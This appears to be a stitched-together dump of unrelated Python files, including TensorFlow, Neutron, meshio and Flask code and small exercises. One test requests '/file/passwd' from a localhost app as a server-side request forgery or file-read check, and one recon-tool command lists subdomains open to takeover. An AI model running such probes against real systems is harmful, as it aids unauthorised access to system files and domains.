""" num_channels = img.get_shape().as_list()[-1] assert num_channels == 1 # load filter which can be reused with tf.variable_scope("misc/img_gradient", reuse=tf.AUTO_REUSE): # truncate for 3 sigma half_width = int(3 * sigma + 0.5) size = 2 * half_width + 1 filter_x, filter_y = _first_deriviate_gaussian_filters(size, sigma) # calculate grad_x = tf.nn.depthwise_conv2d(img, filter_x, strides=[1, 1, 1, 1], padding="VALID", name="grad_x") grad_y = tf.nn.depthwise_conv2d(img, filter_y, strides=[1, 1, 1, 1], padding="VALID", name="grad_y") grad_xy = tf.concat([grad_x, grad_y], axis=-1) return grad_xy <reponame>BeatHubmann/19F-HPC2 import subprocess p = 1 avg = 3 timings = {} for gc in range(2, 6): for ur in range(1, 6): for dr in range(1, 11): result = {} time = 0 for _ in range(avg): output = subprocess.check_output( ['./heat2d', '-p', str(p), '-v', '-gc', str(gc), '-ur', str(ur), '-dr', str(dr)]) for row in output.decode('utf-8').split('\n'): if ': ' in row: key, value = row.split(': ') result[key.strip()] = value.strip('s') time += float(result['Running Time']) time /= avg timings['gc= ' + str(gc) + ' ur= ' + str(ur) + ' dr= ' + str(dr)] = time print(gc, ur, dr, time) [print(key , ' : ' , value, 's') for (key, value) in sorted(timings.items() , key=lambda x: x[1] ) ] from bs4 import BeautifulSoup import requests def test_act6(): session = requests.session() login = session.post("http://localhost:5000/login", {"username": "<EMAIL>", "password": "password"}).text send_ssrf = session.get("http://localhost:5000/file/passwd").content soup = BeautifulSoup(send_ssrf, "html.parser") text=soup.find_all(text=True) assert "root" in text[0] if __name__ == "__main__": test_act6() # Copyright 2015 Red Hat, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import functools import os import signal from neutron.agent.common import async_process from neutron.agent.linux import utils from neutron.common import utils as common_utils from neutron.tests.functional.agent.linux import test_async_process from neutron.tests.functional import base as functional_base class TestPIDHelpers(test_async_process.AsyncProcessTestFramework): def test_get_cmdline_from_pid_and_pid_invoked_with_cmdline(self): cmd = ['tail', '-f', self.test_file_path] proc = async_process.AsyncProcess(cmd) proc.start(block=True) self.addCleanup(proc.stop) pid = proc.pid self.assertEqual(cmd, utils.get_cmdline_from_pid(pid)) self.assertTrue(utils.pid_invoked_with_cmdline(pid, cmd)) self.assertEqual([], utils.get_cmdline_from_pid(-1)) class TestGetRootHelperChildPid(functional_base.BaseSudoTestCase): def _addcleanup_sleep_process(self, parent_pid): sleep_pid = utils.execute( ['ps', '--ppid', parent_pid, '-o', 'pid=']).strip() self.addCleanup( utils.execute, ['kill', '-9', sleep_pid], check_exit_code=False, run_as_root=True) def test_get_root_helper_child_pid_returns_first_child(self): """Test that the first child, not lowest child pid is returned. 
Test creates following process tree: sudo + | +--rootwrap + | +--bash+ | +--sleep 100 and tests that pid of `bash' command is returned. """ def wait_for_sleep_is_spawned(parent_pid): proc_tree = utils.execute( ['pstree', parent_pid], check_exit_code=False) processes = [command.strip() for command in proc_tree.split('---') if command] if processes: return 'sleep' == processes[-1] cmd = ['bash', '-c', '(sleep 100)'] proc = async_process.AsyncProcess(cmd, run_as_root=True) proc.start() # root helpers spawn their child processes asynchronously, and we # don't want to use proc.start(block=True) as that uses # get_root_helper_child_pid (The method under test) internally. sudo_pid = proc._process.pid common_utils.wait_until_true( functools.partial( wait_for_sleep_is_spawned, sudo_pid), sleep=0.1) child_pid = utils.get_root_helper_child_pid( sudo_pid, cmd, run_as_root=True) self.assertIsNotNone( child_pid, "get_root_helper_child_pid is expected to return the pid of the " "bash process") self._addcleanup_sleep_process(child_pid) with open('/proc/%s/cmdline' % child_pid, 'r') as f_proc_cmdline: cmdline = f_proc_cmdline.readline().split('\0')[0] self.assertIn('bash', cmdline) class TestFindParentPid(functional_base.BaseSudoTestCase): def _stop_process(self, process): process.stop(kill_signal=signal.SIGKILL) def _test_process(self, run_as_root): test_pid = str(os.getppid()) cmd = ['bash', '-c', '(sleep 10)'] proc = async_process.AsyncProcess(cmd, run_as_root=run_as_root) proc.start() self.addCleanup(self._stop_process, proc) common_utils.wait_until_true(lambda: proc._process.pid, sleep=0.5, timeout=10) bash_pid = utils.find_parent_pid(proc._process.pid) testcase_pid = utils.find_parent_pid(bash_pid) self.assertEqual(test_pid, testcase_pid) def test_root_process(self): self._test_process(run_as_root=True) def test_non_root_process(self): self._test_process(run_as_root=False) class TestGetProcessCountByName(functional_base.BaseSudoTestCase): def _stop_processes(self, processes): for process in processes: process.stop(kill_signal=signal.SIGKILL) def test_root_process(self): cmd = ['sleep', '100'] processes = [] for _ in range(20): process = async_process.AsyncProcess(cmd) process.start() processes.append(process) for process in processes: common_utils.wait_until_true(lambda: process._process.pid, sleep=0.5, timeout=5) self.addCleanup(self._stop_processes, processes) number_of_sleep = utils.get_process_count_by_name('sleep') # NOTE(ralonsoh): other tests can spawn sleep processes too, but at # this point we know there are, at least, 20 "sleep" processes running. 
self.assertLessEqual(20, number_of_sleep) class TestFindChildPids(functional_base.BaseSudoTestCase): def _stop_process(self, process): process.stop(kill_signal=signal.SIGKILL) def test_find_child_pids(self): pid = os.getppid() child_pids = utils.find_child_pids(pid) child_pids_recursive = utils.find_child_pids(pid, recursive=True) for _pid in child_pids: self.assertIn(_pid, child_pids_recursive) cmd = ['sleep', '100'] process = async_process.AsyncProcess(cmd) process.start() common_utils.wait_until_true(lambda: process._process.pid, sleep=0.5, timeout=10) self.addCleanup(self._stop_process, process) child_pids_after = utils.find_child_pids(pid) child_pids_recursive_after = utils.find_child_pids(pid, recursive=True) self.assertEqual(child_pids, child_pids_after) for _pid in child_pids + [process.pid]: self.assertIn(_pid, child_pids_recursive_after) def test_find_non_existing_process(self): with open('/proc/sys/kernel/pid_max', 'r') as fd: pid_max = int(fd.readline().strip()) self.assertEqual([], utils.find_child_pids(pid_max)) <gh_stars>0 from pyblish import api class ValidateOutputRange(api.InstancePlugin): """Validate the output range of the task. This compares the output range and clip associated with the task, so see whether there is a difference. This difference indicates that the user has selected to export the clip length for the task which is very uncommon to do. """ order = api.ValidatorOrder families = ["trackItem.task"] label = "Output Range" hosts = ["hiero"] optional = True def process(self, instance): task = instance.data["task"] item = instance.data["parent"] output_range = task.outputRange() first_frame = int(item.data["item"].source().sourceIn()) last_frame = int(item.data["item"].source().sourceOut()) clip_duration = last_frame - first_frame + 1 difference = clip_duration - output_range[1] failure_message = ( 'Looks like you are rendering the clip length for the task ' 'rather than the cut length. If this is intended, just uncheck ' 'this validator after resetting, else adjust the export range in ' 'the "Handles" section of the export dialog.' ) assert difference, failure_message class ValidateImageSequence(api.InstancePlugin): """Validate image sequence output path is setup correctly.""" order = api.ValidatorOrder families = ["trackItem.task", "img"] match = api.Subset label = "Image Sequence" hosts = ["hiero"] optional = True def process(self, instance): resolved_path = instance.data["task"].resolvedExportPath() msg = ( "Image sequence output is missing a padding. Please add \"####\" " "or \"%04d\" to the output templates." ) assert "#" in resolved_path or "%" in resolved_path, msg # -------------- from csv import reader # Read the data file and store it as a list 'movies' opened_file = open(path, encoding="utf8") read_file = reader(opened_file) movies = list(read_file) # The first row is header. Extract and store it in 'movies_header'. 
movies_header=movies[0] # Subset the movies dataset such that the header is removed from the list and store it back in movies movies=movies[1:] def explore_data(dataset, start, end, rows_and_columns=False): data=dataset[start:end] for row in data: print(row) print('\n') explore_data(movies,4553,4553) # Delete wrong data del movies[4553] explore_data(movies,0,5) #identifying duplicate movies def duplicate_and_unique_movies(dataset, index_): unique_movie=[] duplicate_movie=[] for movie in dataset: name=movie[index_] if name in unique_movie: duplicate_movie.append(name) else: unique_movie.append(name) print("No of duplicate movies:",len(duplicate_movie)) print('\n') print("Examples of duplicate movies",duplicate_movie[:5]) duplicate_and_unique_movies(movies,-2) # Create a dictionary, 'reviews_max' that will have the name of the movie as key, and the maximum number of reviews as values. reviews_max={} for movie in movies: name=movie[-2] reviews=movie[-3] if name in reviews_max and reviews_max[name]<reviews: reviews_max[name]=reviews elif name not in reviews_max: reviews_max[name]=reviews print(len(movies)) print(len(reviews_max)) # Create a list 'movies_clean', which will filter out the duplicate movies and contain the rows with maximum number of reviews for duplicate movies, as stored in 'review_max'. movies_clean=[] movies_name=[] for data in movies: name=data[-2] reviews=data[-3] if reviews_max[name]==reviews and name not in movies_name : movies_clean.append(data) movies_name.append(name) print(len(movies_clean)) print(len(movies_name)) # Creating movies_lang(), extract all the english movies and store it in movies_en. def movies_lang(dataset, index_, lang_): movies_=[] for movie in movies: lang=movie[index_] if lang==lang_: movies_.append(movie) print(len(movies_)) return movies_ movies_en=movies_lang(movies_clean,3,"en") #Create the rate_bucket function to see the movies with rating higher than 8. 
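# --------------------------------------------------------------------------
# Aside on the reviews_max de-duplication step above: csv.reader yields every
# field as a string, so `reviews_max[name] < reviews` compares review counts
# lexicographically (e.g. "9" > "10"). A small sketch of the same "keep the
# row with the most reviews" idea with an explicit numeric conversion; the
# column indexes mirror the ones used above but are otherwise illustrative:
def _max_reviews_by_name(rows, name_idx=-2, reviews_idx=-3):
    best = {}
    for row in rows:
        name, reviews = row[name_idx], float(row[reviews_idx])
        if name not in best or reviews > best[name]:
            best[name] = reviews
    return best

assert _max_reviews_by_name(
    [["2", "9", "A", "x"], ["3", "10", "A", "x"]],
    name_idx=2, reviews_idx=1) == {"A": 10.0}
# (rate_bucket, announced in the comment just above, continues below.)
# --------------------------------------------------------------------------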
def rate_bucket(dataset, rate_low, rate_high): high_rated_movies=[] for movie in dataset: rating=float(movie[-4]) if ((rating>=rate_low)and (rating<=rate_high)): high_rated_movies.append(movie) print(len(high_rated_movies)) return high_rated_movies high_rated_movies=rate_bucket(movies_en,8,10) <filename>allalgorithms/sorting/shell_sort.py # -*- coding: UTF-8 -*- # # Shell Sort Algorithm # The All ▲lgorithms library for python # # Contributed by: Elias # Github: @eliasbayona # def shell_sort(arr): n = len(arr) h = int(n/2) while h > 0: for i in range(h,n): temp = arr[i] j = i while j >= h and arr[j-h] >temp: arr[j] = arr[j-h] j -= h arr[j] = temp h = int(h/2) return arr <filename>tests/personal_test.py #%% import sys, os sys.path.append("C:/Users/Delgado/Documents/Research/rheology-data-toolkit/rheodata/extractors") import h5py import pandas as pd from antonpaar import AntonPaarExtractor as APE from ARES_G2 import ARES_G2Extractor # %% sys.path.append("C:/Users/Delgado/Documents/Research/rheology-data-toolkit/rheodata") from data_converter import rheo_data_transformer import json # %% # %% machine = APE() multi_file_test = "C:/Users/Delgado/Documents/Research/rheology-data-toolkit/tests/test_data/Anton_Paar/excel_test_data/Steady State Viscosity Curve-LO50C_excel.xlsx" output_folder = "/Users/Delgado/Documents/Research/chimad_project/rheodata/extractors/test_data/" modified_dict, test_raw, cols_info, units_info = machine.import_rheo_data(multi_file_test) # %% test = rheo_data_transformer(modified_data=modified_dict, raw_data=test_raw, cols_info=cols_info, units=units_info) test.load_to_hdf('hdf5_pickle_fix') # %% f = h5py.File("hdf5_pickle_fix.hdf5", "r") print(f["Project"].keys()) print(f["Project"]['Steady State Viscosity Curve-55C'].keys()) print(type(f["Project"]['Steady State Viscosity Curve-55C'].attrs["columns"])) test = f["Project"]['Steady State Viscosity Curve-55C'].attrs["columns"] raw_data = pd.read_hdf('hdf5_pickle_fix.hdf5', 'Project/Steady State Viscosity Curve-55C/clean_data') print(raw_data.head(10)) f.close() f = h5py.File(save_file_name +'.hdf5', "r") print(f.attrs["Project_Name"]) print(f.attrs["Author"]) print(f.attrs["Doi"]) print(f.attrs["Test_Type"]) print(f.attrs["Polymer"]) print(f.attrs["Instrument"]) f.close() # %% add test metadata as json file sample_metadata = { 'data origin':{ "project name": "Test_project", "authors":["<NAME>.", "Solo, <NAME>."], "ORCID":["8888", "1234"], "DOI": "https//8675309" }, 'instrument':{ "type": "rheometer", "make": "Anton Paar", "model": "MCR 302", "additional information":"50 mm plates" }, "polydat":{ "polymer_place_holder":"Test" } } test.add_project_metadata('hdf5_pickle_fix.hdf5', sample_metadata) f = h5py.File("hdf5_pickle_fix.hdf5", "r") test_project = f["Project"].attrs["project_metadata"] test_json = json.loads(test_project) f.close() # %% test_metadata = { 'Steady State Viscosity Curve-LO80C': { "Temperature":25, "Test Type": "Strain Sweep", "Polyanion_MW":100000, "Polycation_MW": 100000, "Polyanion_Charge_Fraction": 100, "Polycation_Charge_Fraction": 100, "Salt_Type": "potassium bromide", "Salt_Concentration": 10, "Solvent": "water", "Solvent_concentration":25, "columns":[] }, 'Steady State Viscosity Curve-75C': { "Temperature":100, "Test Type": "Freq Sweep", "Polyanion_MW":500, "Polycation_MW": 5000, "Polyanion_Charge_Fraction": 100, "Polycation_Charge_Fraction": 100, "Salt_Type": "potassium bromide", "Salt_Concentration": 20, "Solvent": "water", "Solvent_concentration":10, "columns":[] } } # %% 
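# Aside: add_project_metadata above stores project metadata as a JSON string
# in an HDF5 group attribute and reads it back with json.loads. A minimal
# self-contained sketch of that pattern using h5py alone (the file and group
# names here are placeholders, not the toolkit's real layout):
import json
import h5py

with h5py.File("metadata_sketch.hdf5", "w") as _f:
    _grp = _f.create_group("Project")
    _grp.attrs["project_metadata"] = json.dumps({"project name": "example"})

with h5py.File("metadata_sketch.hdf5", "r") as _f:
    _meta = json.loads(_f["Project"].attrs["project_metadata"])
assert _meta["project name"] == "example"
# %%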
test.add_test_metadata(test_metadata) # %% file_path = "C:/Users/Delgado/Documents/Research/rheology-data-toolkit/rheodata/extractors/swag.hdf5" f = h5py.File(file_path, "r") # %% project_metadata = { 'Author': '<NAME>', 'Test_Type': "Strain Sweep", 'Polyanion': 'polystyrene sulfonate', 'Polycation': 'poly (4-vinylpyridine)' } test.add_project_metadata("test3.hdf5", metadata) # %% f = h5py.File('test3.hdf5', "r") # %% f.attrs["name"] test = pd.read_hdf('swag.h5', 'top/Steady State Viscosity Curve/clean_data') # %% f.close() # %% #### ARES tests #### path = "C:/Users/Delgado/Documents/Research/rheology-data-toolkit/tests/test_data/ARES_G2/mixed_test_types/Copy of JeT_5k100-5k100_100mgml_amp_frq_swp_672017 copy.xls" ARES = ARES_G2Extractor(path) modified_output, raw_output, cols_info, units_info = ARES.process_workbook() test = rheo_data_transformer(modified_data=modified_output, raw_data=raw_output, cols_info=cols_info, units=units_info) test.load_to_hdf('AGRES_2_test') f = h5py.File("test_package.hdf5", "r") print(f["Project"].keys()) print(f["Project"]['Temperature Ramp - 1'].keys()) # %% ###### TESTS ####### failed_count=0 for key in test_raw.keys(): df = test_raw[key] if df.iloc[0,0] != 'Project:': print('test_failed') print(key) failed_count += 1 if failed_count == 0: print("Test Passed") else: print(failed_count) # %% failed_count=0 for key in test_raw.keys(): df = test_raw[key] if df.iloc[1,0] != 'Test:': print('test_failed') print(key) failed_count += 1 if failed_count == 0: print("Test Passed") else: print(failed_count) # %%from upydevice import Device, DeviceException from upydev.commandlib import _CMDDICT_ import sys from upydev.helpinfo import see_help KEY_N_ARGS = {'sd_enable': ['po']} VALS_N_ARGS = ['po'] SD_COMMANDS_HELP = """ > SD: Usage '$ upydev COMMAND [opts]' * COMMAND: - sd_enable: to enable/disable the LDO 3.3V regulator that powers the SD module use -po option to indicate the Pin. - sd_init: to initialize the sd card; (spi must be configured first) create sd object and mounts as a filesystem, needs sdcard.py see https://github.com/Carglglz/upydev/blob/master/DOCS/Documentation.md#sd_init - sd_deinit: to unmount sd card - sd_auto: experimental command, needs a sd module with sd detection pin and the SD_AM.py script. Enable an Interrupt with the sd detection pin, so it mounts the sd when is detected, and unmount the sd card when is extracted. 
See more info in: https://github.com/Carglglz/upydev/blob/master/DOCS/Documentation.md#sd_auto """ def sd_command(cmd, *args, **kargs): # FILTER KARGS if cmd not in KEY_N_ARGS: for varg in VALS_N_ARGS: if varg in kargs: kargs.pop(varg) else: for varg in VALS_N_ARGS: if varg in kargs and varg not in KEY_N_ARGS[cmd]: kargs.pop(varg) if cmd == 'sd': print(SD_COMMANDS_HELP) # SD_ENABLE elif cmd == 'sd_enable': po = kargs.pop('po') if po is None: print('Pin required, indicate it with -po option') see_help(cmd) else: po = po[0] dev = Device(*args, **kargs) enabled = dev.cmd(_CMDDICT_['SD_ENABLE'].format(po), silent=True, rtn_resp=True) if dev._traceback.decode() in dev.response: try: raise DeviceException(dev.response) except Exception as e: print(e) else: if enabled: print('SD Enabled') else: print('SD not Enabled') dev.disconnect() sys.exit() # SD_INIT elif cmd == 'sd_init': dev = Device(*args, **kargs) print('Initialzing SD card...') sd_mounted = dev.cmd(_CMDDICT_['SD_INIT'], silent=True, rtn_resp=True) if dev._traceback.decode() in dev.response: try: raise DeviceException(dev.response) except Exception as e: print(e) else: if sd_mounted: print('SD initiated and mounted Successfully!') else: print('SD could not be initiated.') dev.disconnect() sys.exit() # SD_DEINIT elif cmd == 'sd_deinit': dev = Device(*args, **kargs) print('Deinitialzing SD card...') sd_mounted = dev.cmd(_CMDDICT_['SD_DEINIT'], silent=True, rtn_resp=True) if dev._traceback.decode() in dev.response: try: raise DeviceException(dev.response) except Exception as e: print(e) else: if not sd_mounted: print('SD deinitiated Successfully!') else: print('SD could not be deinitiated.') dev.disconnect() sys.exit() # # SD_AUTO elif cmd == 'sd_auto': dev = Device(*args, **kargs) print('Autodetect SD Card mode enabled') dev.wr_cmd(_CMDDICT_['SD_AUTO'], follow=True) dev.disconnect() sys.exit() ######################################################################## # Copyright 2019 Roku, Inc. # #Licensed under the Apache License, Version 2.0 (the "License"); #you may not use this file except in compliance with the License. #You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # #Unless required by applicable law or agreed to in writing, software #distributed under the License is distributed on an "AS IS" BASIS, #WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #See the License for the specific language governing permissions and #limitations under the License. 
######################################################################## from webDriver import WebDriver web_driver = WebDriver("192.168.1.94") web_driver.launch_the_channel("dev") web_driver.verify_is_screen_loaded({"elementData": [{ "using": "text", "value": "ROW 1" }]}) web_driver.press_btn("select") web_driver.verify_is_screen_loaded({"elementData": [{ "using": "text", "value": "<NAME>, <NAME>" }]}) res = web_driver.verify_is_screen_loaded({"elementData": [{ "using": "text", "value": "Authenticate to watch" }]}, False, 2) if res == False: res = web_driver.verify_is_screen_loaded({"elementData": [{ "using": "text", "value": "Play" }]}) web_driver.press_btn("select") else: web_driver.press_btn("select") web_driver.verify_is_screen_loaded({"elementData": [{ "using": "text", "value": "Please enter your username" }]}) web_driver.send_word("user") web_driver.send_button_sequence(["down", "down", "down", "down", "select"]) web_driver.verify_is_screen_loaded({"elementData": [{ "using": "text", "value": "Please enter your password" }]}) web_driver.send_word("<PASSWORD>") web_driver.send_button_sequence(["down", "down", "down", "down", "select"]) web_driver.quiet()<filename>cycif_db/markers/_comparator.py """ Makrer comparator class. """ from ..model import Marker class Marker_Comparator: """ A wrapper class for comparison of Marker objects. Parameters ----------- marker: Marker object fluor_sensitive: bool, default is True. anti_sensitive: bool, default is False. keep_duplicates: str, default is 'keep'. """ def __init__(self, marker, fluor_sensitive=True, anti_sensitive=False, keep_duplicates='keep') -> None: self.marker = marker self.fluor_sensitive = fluor_sensitive self.anti_sensitive = anti_sensitive if keep_duplicates not in ('keep'): raise ValueError("Invalid input for argument `keep_duplicates`!") self.keep_duplicates = keep_duplicates def __repr__(self) -> str: rval = self.marker.name if self.fluor_sensitive and self.marker.fluor: rval += '_' + self.marker.fluor if self.anti_sensitive and self.marker.anti: rval += '_' + self.marker.anti if self.keep_duplicates == 'keep' and self.marker.duplicate: rval += '_' + self.marker.duplicate return rval def __eq__(self, other) -> bool: if not isinstance(other, Marker_Comparator): return False rval = (self.marker.name.lower() == other.marker.name.lower()) if self.fluor_sensitive: this_fluor = self.marker.fluor or '' other_fluor = other.marker.fluor or '' rval = rval and \ (this_fluor.lower() == other_fluor.lower()) if self.anti_sensitive: this_anti = self.marker.anti or '' other_anti = other.marker.anti or '' rval = rval and \ (this_anti.lower() == other_anti.lower()) return rval def __lt__(self, other) -> bool: return repr(self).lower() < repr(other).lower() def __hash__(self) -> int: key = self.marker.name.lower() if self.fluor_sensitive and self.marker.fluor: key += self.marker.fluor.lower() if self.anti_sensitive and self.marker.anti: key += self.marker.anti.lower() return hash(key) <gh_stars>1-10 import csv import StringIO from flask import current_app def getCsvResponseFromJsonList(json_list): output = StringIO.StringIO() headers = ["Date", "Employee ID", "<NAME>", "Store/Dept", "Amount Requested", "Review", "Amount Awarded", "Date Awarded", "Comments", "Date of Event"] writer = csv.writer(output, dialect='excel') writer.writerow(headers) for item in json_list: req_date = item['createdDate'] az_name = '%s %s %s' % (item['requestContent']['applicantInfo'].get('firstName'),\ item['requestContent']['applicantInfo'].get('middleName'),\ 
item['requestContent']['applicantInfo'].get('lastName')) emp_id = item['requestContent']['applicantInfo'].get('employeeId') dept_no = item['requestContent']['applicantInfo'].get('storeDeptNo') amount_req = item['requestContent']['assistanceRequested'].get('amountRequested') review = item['requestContent']['reviewDetails'].get('review') amount_awarded = item['requestContent']['reviewDetails'].get('amountAwarded') date_awarded = item['requestContent']['reviewDetails'].get('dateAwarded') comments = item['requestContent']['reviewDetails'].get('comments') event_date = item['requestContent']['incidentInfo'].get('eventDate') writer.writerow([req_date, emp_id, az_name, dept_no, amount_req, review, amount_awarded, date_awarded, comments, event_date]) results = output.getvalue() output.close() return results # It's impossible not to know the dice game. Please, write a # program that will imitate a roll of one of the dice with the help # of an appropriate random function. # Thus, your task is just to generate one integer in the range from # 1 to 6 and print it. import random # this line is needed for us to check the results, don't modify it random.seed(int(input())) # use a function from the random module in the next line print(random.randrange(1, 7))<filename>app/__init__.py from flask import Flask #from flask_heroku import Heroku from flask_sqlalchemy import SQLAlchemy from flask_login import LoginManager from flask_cors import CORS, cross_origin import os app = Flask(__name__) app.config.from_object(os.environ['APP_SETTINGS']) app.config['PROPAGATE_EXCEPTIONS'] = True #heroku = Heroku(app) CORS(app) login_manager = LoginManager() login_manager.init_app(app) login_manager.login_view = 'login' db = SQLAlchemy(app) from app import views import Command as Cmd import JTarget import JFIO import JEnum import JDto import pickle import os from terminaltables import AsciiTable class Command(Cmd.Command) : def __init__(self) : super().__init__() # Instruction of this command self.command = "dto" # Title of this command self.title = "Domain takeover Checker" # Description of this command self.description = "Finding hijacking available domains." # Usage of this command self.usage = "dto <domain>" def call(self, func) : return self.functions[func]() def run(self, command=[]) : if len(command) == 0 : self.printUsage() return mJTarget = JTarget.JTarget(command[0]) mJDto = JDto.JDto(mJTarget.element("domain")) search = True if os.path.exists(JEnum.takeover + mJTarget.element('domain') + ".bin") : search = False if input("Already checked takeover available. Do you want to recheck? 
(y/N) : ").upper() == "Y" : search = True tablesKey = [["IDX", "DOMAIN"]] if search : res = mJDto.run() if res == False : print("Please run 'subdomain' firstly.") return idx = 0 tables = [] for k, v in res.items() : if v : idx += 1 tables.append([idx, k]) with open(JEnum.takeover + mJTarget.element('domain') + ".bin", "wb") as f : pickle.dump(tables, f) mJTarget.element("takeover", idx) else : with open(JEnum.takeover + mJTarget.element('domain') + ".bin", "rb") as f : tables = pickle.load(f) asciiTable = AsciiTable(tablesKey + tables, "Exploitable Subdomain List") print(asciiTable.table) import keras import pytest import condense import sys sys.path.append('tests/keras') from models import iris @pytest.fixture def example_model(): """Prepare test keras model.""" return iris() def test_simple_one_shot(example_model): """Simple one shot pruning run.""" assert condense.one_shot(example_model, 0.5) <reponame>cyber-republic/elastos-smartweb-service<filename>grpc_adenine/database/user.py # The examples in this file come from the Flask-SQLAlchemy documentation # For more information take a look at: # http://flask-sqlalchemy.pocoo.org/2.1/quickstart/#simple-relationships from datetime import datetime from grpc_adenine.database import (connection as db) """ Users table is mapped to the elastos_console database. Users table has the user information which is stored in it during the registration. """ class Users(db.Model): id = db.Column(db.Integer, primary_key=True) did = db.Column(db.String(64), unique=True, nullable=False) created_on = db.Column(db.DateTime, nullable=False) last_logged_on = db.Column(db.DateTime, nullable=False) def __init__(self, did, created_on=None, last_logged_on=None): self.did = did if created_on is None: created_on = datetime.utcnow() self.created_on = created_on self.last_logged_on = last_logged_on def _repr_(self): return "(did={})"\ .format(self.did) <reponame>dfface/DoctorKG from .standard import * from .few_shot import * class LoginResponse: def __init__( self, access_token: str, fresh_token: str, token_type: str = "bearer" ): self.access_token = access_token self.fresh_token = fresh_token self.token_type = token_type def json(self): return dict( access_token=self.access_token, fresh_token=self.fresh_token, token_type=self.token_type )from datetime import timedelta, datetime import hashlib import os import sendwithus import urllib def unix_time_millis(dt): epoch = datetime.utcfromtimestamp(0) return int((dt - epoch).total_seconds()) def generate_token(data): hash = hashlib.sha256() hash.update(os.environ['EMAIL_TOKEN_SALT']) hash.update(data) return hash.hexdigest() def generate_uri(route, email_address, expiration): uri = route uri += '?email=' + email_address uri += '&expires=' + expiration return uri def create_link(email_address, route): expires = datetime.utcnow() + timedelta(days=1) uri = generate_uri(route, urllib.quote(email_address), str(unix_time_millis(expires))) uri += '&token=' + generate_token(uri) return uri def verify_link(route, email_address, expiration, token): if datetime.fromtimestamp(float(expiration)) < datetime.utcnow(): return False uri = generate_uri(route, urllib.quote(email_address), expiration) return token == generate_token(uri) def send_welcome_email(email_address): api_key = os.environ['SEND_WITH_US'] set_password_link = create_link(email_address, 'password') swu = sendwithus.api(api_key) swu.send( email_id='tem_58MQPDcuQvGKoXG3aVp4Zb', recipient={'address': email_address}, email_data={'setPasswordLink': set_password_link}) def 
send_password_reset_email(email_address): api_key = os.environ['SEND_WITH_US'] set_password_link = create_link(email_address, 'password') swu = sendwithus.api(api_key) swu.send( email_id='tem_shSnhmqCSMAwdLbPhuwY4U', recipient={'address': email_address}, email_data={'setPasswordLink': set_password_link}) <gh_stars>1-10 def add(x,y): return (x+y) def sub(x,y): return (x-y) <reponame>c-abird/meshio<filename>test/test_xdmf.py import numpy import pytest import helpers import meshio test_set_full = [ helpers.line_mesh, helpers.tri_mesh, helpers.line_tri_mesh, helpers.tri_mesh_2d, helpers.triangle6_mesh, helpers.quad_mesh, helpers.quad8_mesh, helpers.tri_quad_mesh, helpers.tet_mesh, helpers.tet10_mesh, helpers.hex_mesh, helpers.hex20_mesh, helpers.add_point_data(helpers.tri_mesh, 1), helpers.add_cell_data(helpers.tri_mesh, [("a", (), numpy.float64)]), ] test_set_reduced = [ helpers.tri_mesh, helpers.tri_mesh_2d, helpers.quad_mesh, helpers.tri_quad_mesh, helpers.tet_mesh, helpers.hex_mesh, helpers.add_point_data(helpers.tri_mesh, 1), helpers.add_cell_data(helpers.tri_mesh, [("a", (), numpy.float64)]), ] @pytest.mark.parametrize("mesh", test_set_full) @pytest.mark.parametrize("data_format", ["XML", "Binary", "HDF"]) def test_xdmf3(mesh, data_format): def write(*args, **kwargs): return meshio.xdmf.write(*args, data_format=data_format, **kwargs) helpers.write_read(write, meshio.xdmf.read, mesh, 1.0e-14) # HDF5 compressed I/O @pytest.mark.parametrize("mesh", test_set_full) def test_compression(mesh): def write(*args, **kwargs): return meshio.xdmf.write(*args, data_format="HDF", compression="gzip", **kwargs) helpers.write_read(write, meshio.xdmf.read, mesh, 1.0e-14) def test_generic_io(): helpers.generic_io("test.xdmf") # With additional, insignificant suffix: helpers.generic_io("test.0.xdmf") def test_time_series(): # write the data filename = "out.xdmf" with meshio.xdmf.TimeSeriesWriter(filename) as writer: writer.write_points_cells(helpers.tri_mesh_2d.points, helpers.tri_mesh_2d.cells) n = helpers.tri_mesh_2d.points.shape[0] times = numpy.linspace(0.0, 1.0, 5) point_data = [ { "phi": numpy.full(n, t), "u": numpy.full(helpers.tri_mesh_2d.points.shape, t), } for t in times ] for t, pd in zip(times, point_data): writer.write_data( t, point_data=pd, cell_data={"a": {"triangle": [3.0, 4.2]}} ) # read it back in with meshio.xdmf.TimeSeriesReader(filename) as reader: points, cells = reader.read_points_cells() for k in range(reader.num_steps): t, pd, cd = reader.read_data(k) assert numpy.abs(times[k] - t) < 1.0e-12 for key, value in pd.items(): assert numpy.all(numpy.abs(value - point_data[k][key]) < 1.0e-12) # def test_information_xdmf(): # mesh_out = meshio.Mesh( # numpy.array( # [[0.0, 0.0, 0.0], [1.0, 0.0, 0.0], [1.0, 1.0, 0.0], [0.0, 1.0, 0.0]] # ) # / 3, # [("triangle", numpy.array([[0, 1, 2], [0, 2, 3]]))], # field_data={ # "bottom": numpy.array([1, 1]), # "right": numpy.array([2, 1]), # "top": numpy.array([3, 1]), # "left": numpy.array([4, 1]), # }, # ) # # write the data # points, cells, field_data = mesh_out.points, mesh_out.cells, mesh_out.field_data # # assert cells[0].type == "triangle" # meshio.write( # "mesh.xdmf", # meshio.Mesh(points=points, cells=[cells[0]], field_data=field_data), # ) # # # read it back in # mesh_in = meshio.read("mesh.xdmf") # assert len(mesh_in.field_data) == len(mesh_out.field_data) if __name__ == "__main__": test_time_series() N = int(input()) A = 0 B = 0 M = 1 while N != 0: if N % 10 == 7: A += 6 * M B += 1 * M else: A += (N % 10) * M N //= 10 M *= 10 print(A, B) 
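# Illustrative check (added here, not part of the original snippet above): the loop
# splits N digit by digit so that A + B == N, mapping every digit 7 to a 6 in A and
# a 1 in B. A quick sketch of the same logic as a hypothetical helper, with one
# worked example:
def split_no_seven(n):
    a, b, m = 0, 0, 1
    while n != 0:
        d = n % 10
        if d == 7:
            a += 6 * m   # digit 7 becomes a 6 in A ...
            b += 1 * m   # ... and a 1 in B, so the column still sums to 7
        else:
            a += d * m   # other digits pass through to A unchanged
        n //= 10
        m *= 10
    return a, b

assert split_no_seven(1777) == (1666, 111)   # 1666 + 111 == 1777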
